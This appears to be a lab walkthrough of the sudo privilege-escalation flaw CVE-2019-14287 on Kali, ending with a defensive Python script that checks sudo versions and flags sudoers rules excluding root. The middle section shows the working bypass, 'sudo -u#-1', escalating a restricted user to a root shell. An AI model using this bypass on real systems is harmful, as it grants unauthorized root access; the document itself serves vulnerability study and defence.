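0x00 Vulnerability overview
The sudo local privilege escalation vulnerability (CVE-2019-14287) is caused by improper configuration in the sudo configuration file. It allows an ordinary user to bypass the restriction and execute commands as root.
0x01 Affected versions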
sudo < 1.8.28
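0x02 What sudo does
sudo is a tool that lets a system administrator allow ordinary users to run some or all root commands. This reduces the time spent logging in and administering as root, and it also improves security.
0x03 sudo permissions
sudo permissions are controlled in the configuration file /etc/sudoers. The permissions on that file are as follows: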
root@kali:~# ls -al /etc/sudoers
-r--r----- 1 root root 669 Aug 7 02:58 /etc/sudoers
0x04 Reproducing the vulnerability
Platform: kali-2019.03
root@kali:~# lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description: Kali GNU/Linux Rolling
Release: 2019.3
Codename: kali-rolling
sudo version
root@kali:~# sudo -V
Sudo version 1.8.27
Back up the sudo configuration file
root@kali:~# cp /etc/sudoers /etc/sudoers.bak
root@kali:~# ls -al /etc/sudoers*
-r--r----- 1 root root 669 Aug 7 02:58 /etc/sudoers
-r--r----- 1 root root 669 Nov 2 15:37 /etc/sudoers.bak
/etc/sudoers.d:
total 20
drwxr-xr-x 2 root root 4096 Oct 29 17:25 .
drwxr-xr-x 163 root root 12288 Nov 2 15:37 ..
-r--r----- 1 root root 958 Aug 7 02:58 README
Create ordinary users
root@kali:~# useradd test
root@kali:~# passwd test
New password:
Retype new password:
passwd: password updated successfully
root@kali:~# useradd world
root@kali:~# passwd world
New password:
Retype new password:
passwd: password updated successfully
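Edit the sudo configuration file
# Open the configuration file
visudo
Add the following to the configuration file, allowing the test user to run the id command as any user
# Content to add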
test ALL=(ALL) /usr/bin/id
Command test
root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ id
uid=1000(test) gid=1000(test) groups=1000(test)
$ sudo -u root id
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for test:
uid=0(root) gid=0(root) groups=0(root)
$ sudo -u world id
uid=1001(world) gid=1001(world) groups=1001(world)
$ sudo -u root whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$ sudo -u world whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as world on kali.
$
root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#0 id
uid=0(root) gid=0(root) groups=0(root)
$ sudo -u#1001 id
uid=1001(world) gid=1001(world) groups=1001(world)
$ sudo -u#0 whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$ sudo -u#1001 whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as world on kali.
$
Discovering the vulnerability
root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#-1 id
uid=0(root) gid=1000(test) groups=1000(test)
$
Reconfigure the sudo configuration file so that the test user may run any command as any user except root
test ALL=(ALL,!root) ALL
Command test
root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u test id
uid=1000(test) gid=1000(test) groups=1000(test)
$ sudo -u test whoami
test
$ sudo -u root id
Sorry, user test is not allowed to execute '/usr/bin/id' as root on kali.
$ sudo -u root whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$
Triggering the vulnerability
root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#-1 id
uid=0(root) gid=1000(test) groups=1000(test)
$ sudo -u#-1 whoami
root
$ sudo -u#-1 /bin/bash
root@kali:/root# id
uid=0(root) gid=1000(test) groups=1000(test)
root@kali:/root# whoami
root
root@kali:/root#
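A defender-side check for the two conditions this walkthrough relies on, as an added example that is not part of the original post: it compares sudo -V output against the affected range (sudo < 1.8.28) and flags sudoers rules whose Runas list grants ALL while excluding root by negation, as in (ALL,!root). The function names and the sample sudoers text are assumptions made for illustration; Runas_Alias expansion and files under /etc/sudoers.d are not handled.

```python
import re

FIXED = (1, 8, 28)  # the page lists sudo < 1.8.28 as affected
RUNAS = re.compile(r"=\s*\(([^)]*)\)")  # the "(...)" Runas spec after "host="

# Constructed sample; the two "test" rules are the ones used on this page.
SAMPLE = """\
# constructed sample sudoers content
#includedir /etc/sudoers.d
root    ALL=(ALL:ALL) ALL
test    ALL=(ALL) /usr/bin/id
test    ALL=(ALL,!root) ALL
ops     ALL=(ALL, !#0) /usr/bin/systemctl
world   ALL=(www-data) /usr/bin/id
"""

def is_affected_version(sudo_v_output):
    """True if the upstream version in `sudo -V` output is below 1.8.28.
    Distribution packages may backport the fix without changing this
    number, so treat True as a prompt to check the vendor advisory."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output)
    if not m:
        raise ValueError("no sudo version found")
    return tuple(int(x) for x in m.groups()) < FIXED

def risky_rules(sudoers_text):
    """Return rules whose Runas user list contains ALL together with a
    negated root entry (!root or !#0): the pattern that `-u#-1` bypasses."""
    hits = []
    text = sudoers_text.replace("\\\n", " ")  # join continuation lines
    for line in text.splitlines():
        rule = line.strip()
        # Skip blanks and comments/includes; "#<digits>" at line start is a UID.
        if not rule or (rule.startswith("#") and not re.match(r"#\d", rule)):
            continue
        for spec in RUNAS.findall(rule):
            # Runas spec is "users[:groups]"; only the user list matters here.
            users = [u.replace(" ", "") for u in spec.split(":")[0].split(",")]
            if "ALL" in users and any(u in ("!root", "!#0") for u in users):
                hits.append(rule)
                break
    return hits

if __name__ == "__main__":
    print("affected version:", is_affected_version("Sudo version 1.8.27"))
    for r in risky_rules(SAMPLE):
        print("review rule:", r)
```

A rule such as test ALL=(ALL) /usr/bin/id is not flagged because it already permits running the command as root, so the -u#-1 form grants nothing beyond what the rule allows.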